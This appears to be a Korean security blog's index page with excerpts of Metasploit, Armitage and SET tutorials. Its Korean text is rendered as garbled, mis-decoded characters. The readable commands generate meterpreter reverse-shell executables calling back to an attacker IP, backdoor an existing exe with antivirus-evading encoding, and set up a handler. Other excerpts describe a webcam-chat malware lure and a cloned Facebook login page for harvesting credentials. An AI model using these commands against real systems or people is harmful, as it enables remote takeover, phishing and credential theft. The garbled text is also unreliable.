๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž! -armitage 2ํŽธ
Metasploit/Kali & Backtrack 2023. 8. 21. 19:56

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. 2023.08.18 - [Metasploit/Kali & Backtrack] - ๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ ๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ blog.z3alous.xyz ๋ช‡์ผ ์ „์— ์œ„์˜ ๊ธ€์„ ์ž‘์„ฑํ•˜์˜€๋‹ค. ์ด..

article thumbnail
๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ
Metasploit/Kali & Backtrack 2023. 8. 18. 22:41

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ์•ฝ 1๋‹ฌ ์ „์ฏค toss์—์„œ ๋งŒ๋“ค์–ด์ง„ ์˜์ƒ์„ ๋ณด์•˜๋‹ค. ํ•ด๋‹น์˜์ƒ์ด๋‹ค. https://youtu.be/tAqgvP07RnQ ํ•ด๋‹น ์˜์ƒ์„ ๋ณด๋Š”๋™์•ˆ ์‹œ๊ฐ„ ๊ฐ€๋Š”์ค„ ๋ชจ๋ฅด๊ณ  ๊ณ„์† ๋ณด๊ณ ์žˆ์—ˆ๋‹ค. ํ•ด๋‹น ๋™์˜์ƒ์— ๋‚˜์˜ค๋Š” ๋ถ„๋“ค์„ ์‹ค์ œ๋กœ ์•„๋Š” ๋ถ„๋“ค์ด์ง€๋งŒ ์ด๋ ‡๊ฒŒ ๋ณด๋‹ˆ ๋”๋”์šฑ ๋ฉ‹์žˆ์–ด ๋ณด์˜€๋‹ค. 'ํ† ์Šค๋ฅผ ํ•ดํ‚นํ•˜๋Š” ์ž' ๋ผ๋Š” ์˜์ƒ์„ ๋ณด๊ณ  ์—ฌ๋Ÿฌ๊ฐ€์ง€์— ํฅ๋ฏธ๋ฅผ ๊ฐ€์กŒ๋‹ค. forensic์„ ์ฃผ๋กœ ํ•˜๋˜ ๋‚˜์˜€๋Š”๋ฐ ์—…๋ฌด๋ฅผ ํ•˜๋ฉด์„œ ์กฐ๊ธˆ์”ฉ ์ทจ์•ฝ์ ๊ณผ ๋ชจ์˜ํ•ดํ‚น..

article thumbnail
Kali Linux by pass - Hack Windows metasploit tutorial
Metasploit 2016. 12. 22. 18:48

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์›ํ•˜๋Š” ํฌํŠธ] -f exe > filename.exe ๊ทธ๋Ÿผ /root ํด๋”์— exeํŒŒ์ผ์ด ์ƒ๊ธด๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค.๊ทธ๋Ÿผ ๋‹ค์Œ์œผ๋กœ๋Š” ์ปจํŠธ๋กคํ•  ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ค์–ด๋ณด์ž. ๋จผ์ € msfconsole์„ ์ž…๋ ฅํ•œ๋‹ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์šฐ๋ฆฌ๊ฐ€ ํŒŒ์ผ์„ ๋งŒ๋“ค๋•Œ ์‚ฌ์šฉํ•œ payload]set LHOST [attacker ip]set LP..

article thumbnail
Hack windows with metasploit Java Applet JMX Remote Code Execution
Metasploit 2016. 12. 22. 03:39

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฐ๊ตฌ ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๋จผ์ € ํ•˜๊ธฐ์ „์— ๋ฆฌ๋ˆ…์Šค์—์„œ service apache2 startservice postgresql startservice metastploit start ๋ช…๋ น์–ด๋“ค์„ ์‹คํ–‰ ์‹œ์ผœ์ค€๋‹ค. ๊ทธ ํ›„ msfconsole์„ ํ•ด์ค€๋‹ค. ๊ทธ๋Ÿผ ์œ„์™€๊ฐ™์€ ์ฐฝ์ด ๋œฐ๊ฒƒ์ด๋‹ค. (๊ทธ๋ฆผ์€ ๋‹ค๋ฅผ ์ˆ˜ ์žˆ๋‹ค.) ๊ทธ ํ›„ ์šฐ๋ฆฌ๊ฐ€ ํ•ด์•ผํ•  ์ผ์€ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“œ๋Š” ์ผ์ด๋‹ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ๋‹ค์Œ ํ•ด์•ผ ํ•  ํ–‰๋™์œผ๋กœ show options ์„ ์ด์šฉํ•˜์—ฌ ์šฐ๋ฆฌ๊ฐ€ ์ •ํ•ด์ค˜์•ผํ•˜๋Š” ๊ฒƒ์„ ๋ณธ๋‹ค. ๋จผ์ € URIPATH ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ฒฝ๋กœ๋ฅผ ์ง€์ •ํ•ด์ค€๋‹ค. / ํ•ด๋„๋˜๊ณ  test๋ฅผ ํ•ด๋„๋œ๋‹ค. ์ง€์ •ํ•˜์ง€..

article thumbnail
์š”์ฆ˜ ์œ ํ–‰ ํ•˜๋˜ ๋ชธ์บ  (๊ธฐ์ดˆ๋ฐฉ์‹)
Metasploit 2016. 12. 15. 22:37

์š”์ฆ˜ ๋ชธ์บ ์ด ์œ ํ–‰์„ ํ–ˆ์—ˆ๋‹ค. ๋Œ€์ถฉ ์›๋ฆฌ๋ฅผ ๋ณด๋ฉด ์Šค์นดxx๊ฐ™์€ ๊ณณ์—์„œ ์ฑ„ํŒ…์„ ํ•˜๋‹ค๊ฐ€ ๋ชธ์บ ์„ ํ•˜์ž๊ณ  ํŒŒ์ผ์„ ๋ฐ›์œผ๋ผ๊ณ  ํ•œ๋‹ค. (๋ชธ์บ ์„ ํ•˜๊ธฐ์œ„ํ•œ ์ „์šฉ ํŒŒ์ผ์ด๋ผ ๋ปฅ์„ ์นœ๋‹ค.) ๊ทธ๋Ÿฌ๊ณ  ํŒŒ์ผ์„ ๋ณด๋‚ด๋Š”๋ฐ ๊ทธ ํŒŒ์ผ์€ ๋‹น์—ฐํžˆ ์•…์„ฑ์ฝ”๋“œ !! :) ์ด์ œ ๊ทธ๊ฒƒ์„ ์žฌ์—ฐํ•ด๋ณด์ž ๊ทธ์ „์— ๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.์‹œ์ž‘ํ•ด๋ณด์ž :X ๋จผ์ € service apache2 start๋กœ ์•„ํŒŒ์น˜๋ฅผ ์‹คํ–‰ ์‹œ์ผœ์ฃผ๊ณ  service postgresql start ๋กœ postgresql ๋˜ํ•œ ์‹œํ‚จ๋‹ค. ๊ถ๊ทน์ ์ธ ๋ช…๋ น์–ด service metasploit start ๋กœ metasploit ๋˜ํ•œ ์‹คํ–‰์‹œํ‚จ๋‹ค. ๊ทธ ํ›„ ์ด์ œ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ๋งŒ๋“ค์–ด์•ผ ํ•˜๋Š”๋ฐ...๋ช…๋ น์–ด msfvenom์„ ์ด์šฉ ํ•˜์—ฌ ๋งŒ๋“ค์–ด ๋ณด์ž.msfvenom -p android/meterpreter/..

ํŒŒ์ผํ•ฉ์น˜๊ธฐ (์•…์„ฑ์ฝ”๋“œ์žˆ๋Š” ํŒŒ์ผ๋งŒ๋“ค๊ธฐ)
Metasploit 2016. 5. 24. 15:37

๋ชจ๋“  ์‚ฌ์šฉ์˜ ๋ฒ•์  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. msfvenom -a ์•„ํ‚คํ…์ณ --platform ํ”Œ๋žซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํ•ธ๋“ค๋Ÿฌ์—์„œ ํ”„๋กœ์„ธ์Šค ์˜ฎ๊ธฐ๋Š” ๋ช…๋ น์–ด migrate ํ”„๋กœ์„ธ์Šค ๋„˜๋ฒ„ ex) migrate 1111

article thumbnail
๊ฐ€์งœ facebook๋งŒ๋“ค๊ธฐ
Metasploit 2016. 2. 11. 22:46

๋ชจ๋“  ๋ฒ•์  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์„ธ์š”. ๋จผ์ € Kali linux or parrot linux์—์„œ ํ„ฐ๋ฏธ๋„์„ open setoolkit์„ ์ž…๋ ฅํ•œ๋‹ค. ์ž…๋ ฅ์„ ํ•˜๋ฉด ์ด๋Ÿฌํ•œ ์ฐฝ์„ ํ™•์ธ ํ•˜์‹ค์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ Social-Engineering Attacks๋ฅผ ํ•ด์•ผํ•˜๊ธฐ ์œ„ํ•ด 1๋ฒˆ์„ ์ž…๋ ฅํ•ฉ๋‹ˆ๋‹ค. ๋‹ค์Œ์€ Website Attack Vectors์„ ์œ„ํ•ด 2๋ฒˆ ์—ฌ๊ธฐ์—์„  Credential Harvester Attack Method๋ฅผ ์œ„ํ•ด 3๋ฒˆ facebook์„ ๋งŒ๋“ค๊ธฐ ์œ„ํ•ด 2๋ฒˆ์„ ํด๋ฆญํ•ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ๊นŒ์ง€ ํ•˜์…จ์œผ๋ฉด ๋ฐ˜์™”์Šต๋‹ˆ๋‹ค. 2๋ฒˆ์„ ํ•˜์…จ์œผ๋ฉด IP๋ฅผ ์ž…๋ ฅํ•˜์‹œ๋ฉด ๋˜๋Š”๋ฐ์š”! ip๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ์ด์ œ cloneํ•˜๊ธฐ ์œ„ํ•œ ์‚ฌ์ดํŠธ๋ฅผ ์ž…๋ ฅํ•˜์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ €๋Š” facebook.com์„ ํ•˜๊ธฐ์œ„ํ•ด http://faceboo..

article thumbnail
postgreSQL?
Metasploit 2015. 12. 14. 07:37

postgreSQL??? service postgresql start

article thumbnail
msf ์ด์šฉํ•˜๊ธฐ2
Metasploit 2015. 12. 2. 22:42

ํฌํŠธ์Šค์บ๋‹์— ๊ด€ํ•œ ์ด์•ผ๊ธฐ๋ฅผ ๊ณ„์†ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ์•ž์—์„œ ๋งํ•œ๊ฑฐ์™€ ๊ฐ™์ด ํฌํŠธ์Šค์บ๋‹์—๋Š” nmap ๊ฐ™์ด ์œ ๋ช…ํ•œ ๋„๊ตฌ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๋Š” msf ๋ณด์กฐ๊ธฐ๋Šฅ์„ ์ด์šฉํ•ด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. 1. use auxiliary/scanner/smb/smb_version 2. set rhosts 192.168.32.0/24 192.168.32.0/24๋ฅผ ์ด์šฉํ•ด ๋Œ€์—ญ์„ ์Šค์บ”ํ•˜๋Š” ๊ฒƒ์ด๋‹ค. 3. set threads 256 ์ด๋Ÿฌ๊ฒŒ ํ•จ์œผ๋กœ run์„ ํ•  ์ˆ˜ ์žˆ๋‹ค. ์—ฌ๊ธฐ์„œ ์กฐ๊ธˆ๋” ์ž์„ธํžˆ ์•Œ๊ณ ์‹ถ๊ณ  ์•„์ดํ”ผ๋ฅผ ์•ˆ๋‹ค๋ฉด 1. use auxiliary/scanner/netbios/nbname 2. set rhosts IP 3. set threads 256 ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด run์„ ํ• ์ˆ˜ ์žˆ๋‹ค. IP๋Œ€์—ญ์„ ์ด์šฉํ•˜์—ฌ mysql ํƒ์ƒ‰ํ•˜๋Š” ๋ฐฉ๋ฒ• 1. use auxiliary..

article thumbnail
msfconsole ์ด์šฉํ•˜๊ธฐ
Metasploit 2015. 12. 1. 03:03

์•ž์—์˜ ๊ธ€์—์„œ๋Š” msfconsole ์—์„œ company_name ์„ ์ด์šฉํ•ด์„œ ์•Œ์•„ ๋ณด์•˜๋‹ค.์ด๋ฒˆ์—๋Š” company_name ์—์„œ ์•Œ์•„๋‚ธ ์ •๋ณด๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ณด์ž. ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ณด์ž .1. use auxiliary/gather/corpwatch_lookup_id์ด๋Š” name ์ฒ˜๋Ÿผ ๋ณด์กฐ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜๋Š”๋ฐ name ๋Œ€์‹ ์— id๋ฅผ ์ด์šฉํ•˜๊ฒ ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค. 2. set cw_id cw_40155์ด๋ ‡๊ฒŒ ์•„์ด๋””๋ฅผ ์ง€์ •ํ•˜์ค€๋‹ค. 3. set get_history true (true๋ฅผ ์ƒ๋žตํ•˜๋‹ˆ false๋กœ ๊ฐ„์ฃผ ํ•œ๋‹ค.) ๋‹ค์Œ์€ run run์„ ํ•˜๊ฒŒ ๋˜๋ฉด cw_id์— ์ž…๋ ฅํ•œ ๊ฐ’์„ ๊ธฐ๋ฐ˜์œผ๋กœ ๊ฒ€์ƒ‰์„ ํ•œ๋‹ค. ์ด๋Ÿฌํ•˜๋“ฏ ๋งŽ์€ ์ •๋ณด๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค. ๋˜ํ•œ cw_~~~.txt๋กœ ์ €์žฅ๋„ ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ msf์—์„œ ๋ณด์กฐ ๊ธฐ๋Šฅ์„ ์ด์šฉํ•˜์—ฌ ํฌํŠธ์Šค์บ๋‹์„..

article thumbnail
kali linux ์—์„œ์˜ msf
Metasploit 2015. 12. 1. 02:41

๊ณผ์—ฐ ์ œ๋ชฉ์—์„œ ๋งํ•œ msf๋Š” ๋ฌด์—‡์ผ๊นŒ?msf๋Š” Metasploit Framework์ด๋‹ค. ์ด๋Š” ํŽ„์–ธ์–ด๋กœ ์ž‘์„ฑํ•œ ๋ชจ์˜ ์นจํˆฌ ๋„๊ตฌ์ธ๋‹ค. ๊ณผ์—ฐ kali linux์—์„œ ์–ด๋–ป๊ฒŒ ์‹คํ–‰ ์‹œํ‚ฌ๊นŒ?1. service postgresql start ์ด ๋ช…๋ น์–ด๋Š” postgresSQL ์„œ๋ฒ„๋ฅผ ์‹คํ–‰์‹œํ‚ค๋Š” ๋ช…๋ น์–ด์ด๋‹ค. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด postgreSQL ์„œ๋ฒ„๊ฐ€ ์‹คํ–‰๋œ ๊ฒƒ์ด๋‹ค. 2. service metasploit start (msfdb init

728x90
๋ฐ˜์‘ํ˜•
profile on loading

Loading...